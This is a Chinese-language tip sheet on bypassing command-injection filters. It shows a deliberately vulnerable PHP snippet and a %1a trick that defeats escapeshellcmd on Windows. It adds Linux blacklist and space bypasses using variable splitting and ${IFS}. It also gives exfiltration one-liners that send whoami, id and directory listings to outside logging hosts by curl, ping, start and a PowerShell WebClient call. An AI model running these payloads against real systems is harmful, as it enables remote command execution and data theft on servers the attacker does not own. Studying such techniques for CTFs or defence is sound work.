先看一個例子：
本地測試環境：php 5.4.45 + win

<?php
    $command = ‘dir ‘.$_POST[‘dir‘];
    $escaped_command = escapeshellcmd($command);
    var_dump($escaped_command);
    file_put_contents(‘out.bat‘,$escaped_command);
    system(‘out.bat‘);
?>

應該如何去繞過執行？

escapeshellcmd

http://php.net/manual/zh/function.escapeshellcmd.php

escapeshellcmd() 對字符串中可能會欺騙 shell 命令執行任意命令的字符進行轉義。 此函數保證用戶輸入的數據在傳送到 exec() 或 system() 函數，或者 執行操作符 之前進行轉義。

具體會轉義哪些字符？

https://github.com/php/php-src/blob/PHP-5.4.45/ext/standard/exec.c

這些都會用^來取消其意義。也就是沒辦法用& | 來執行其他命令，只能列目錄。

有這樣的一個tip：執行.bat文件的時候，利用%1a，可以繞過過濾執行命令。

更多好玩的命令繞過

linux下面tip特別多，在實戰或者ctf中遇到最多的幾個。
1、黑名單繞過

執行ls命令：
a=l;b=s;$a$b

cat hello文件內容：
a=c;b=at;c=he;d=llo;$a$b ${c}${d}

2、空格繞過

繞過空格
${IFS}

或者在讀取文件的時候利用重定向符
<>

最後就是別人fuzz的一個命令執行項目：
https://github.com/ewilded/shelling

3、無回顯
無回顯獲取數據的需求還是挺大的，比如sql，xxe，xss等等，這個時候一般可以用dns/http通道來獲取數據。

linux:

curl xxxx.ceye.io/`whoami`
ping -c 1 `whoami`.xxxx.ceye.io

可以獲取數據，當前權限是root

但是有一個特別惱火的事情就是特殊字符或者是空格出現的話，這時候可以通過一些編碼來，比如base64

curl http://xxxx.ceye.io/$(id|base64)

windows:
windows下很頭疼，用起來並沒有linux那麽方便好用，比如curl、wget等等。

http請求：
for /F %x in (‘whoami‘) do start http://xxx.ceye.io/%x

dns請求：
獲取計算機名：for /F "delims=\" %i in (‘whoami‘) do ping -n 1 %i.xxx.dnslog.info
獲取用戶名：for /F "delims=\ tokens=2" %i in (‘whoami‘) do ping -n 1 %i.xxx.dnslog.info

powershell這麽厲害，為啥不用它來base64一下數據。

for /F %x in (‘whoami‘) do powershell $a=[System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes(‘%x‘));$b=New-Object System.Net.WebClient;$b.DownloadString(‘http://xxx.ceye.io/‘+$a);

這樣就也能獲取到一個base64編碼到命令結果啦～算是彌補一個小小的坑。

ps:這個是用powershell2.0寫的,其他版本未測試。

但是如果沒有powershell想要獲取更多數據的話，還是比較麻煩的。

比如獲取d:\所有文件,遇上空格也是會被截斷。

for /F %x in (‘dir /b D:\‘) do start http://xxx.ceye.io/%x

4、借他人之手來獲取字符
如果過濾了<>?，可以從已有的文件中獲取自己需要的字符。

＝。＝，當然如果服務器能外網的話，直接wget -o /tmp 就好了。

命令執行的tip